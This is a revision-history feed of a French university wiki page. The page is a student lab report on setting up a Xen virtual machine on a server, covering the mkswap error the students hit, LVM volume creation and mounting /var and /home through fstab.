		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52753"/>
				<updated>2020-10-15T09:50:37Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/--gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52752</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52752"/>
				<updated>2020-10-15T09:50:07Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ \--gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52693</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52693"/>
				<updated>2020-10-15T07:09:53Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52692</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52692"/>
				<updated>2020-10-15T07:09:25Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers var et home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52691</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52691"/>
				<updated>2020-10-15T07:07:51Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM (commande xl create -c /etc/xen/morillon.cfg ou si active xl console morillon), nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers var et home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52690</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52690"/>
				<updated>2020-10-15T07:07:14Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM (commande xl create -c /etc/xen/morillon.cfg ou si active xl console morillon), nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers var et home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52677</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52677"/>
				<updated>2020-10-14T20:48:30Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, la commande utilisée est la suivante : &lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM (commande xl create -c /etc/xen/morillon.cfg ou si active xl console morillon), nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers var et home sur les partitions '''xvdav'''.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52676</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52676"/>
				<updated>2020-10-14T20:45:37Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, la commande utilisée est la suivante : &lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des linux-utils, de les configurer et de les installer.&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande pvcreate sur les disques physiques&lt;br /&gt;
puis : lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
puis : lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier var et home de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes 'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM (commande xl create -c /etc/xen/morillon.cfg ou si active xl console morillon), nous modifions le fichier /etc/fstab pour monter automatiquement les dossiers var et home sur les partitions xvdav.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52675</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52675"/>
				<updated>2020-10-14T20:44:12Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, la commande utilisée est la suivante : &lt;br /&gt;
&lt;br /&gt;
xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des linux-utils, de les configurer et de les installer.&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande pvcreate sur les disques physiques&lt;br /&gt;
puis : lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
puis : lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier var et home de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes 'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM (commande xl create -c /etc/xen/morillon.cfg ou si active xl console morillon), nous modifions le fichier /etc/fstab pour monter automatiquement les dossiers var et home sur les partitions xvdav.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52674</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=52674"/>
				<updated>2020-10-14T20:43:43Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, la commande utilisée est la suivante : &lt;br /&gt;
&lt;br /&gt;
xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type ''mkswap'' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des linux-utils, de les configurer et de les installer.&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande pvcreate sur les disques physiques&lt;br /&gt;
puis : lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
puis : lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier var et home de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes 'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM (commande xl create -c /etc/xen/morillon.cfg ou si active xl console morillon), nous modifions le fichier /etc/fstab pour monter automatiquement les dossiers var et home sur les partitions xvdav.&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	</feed>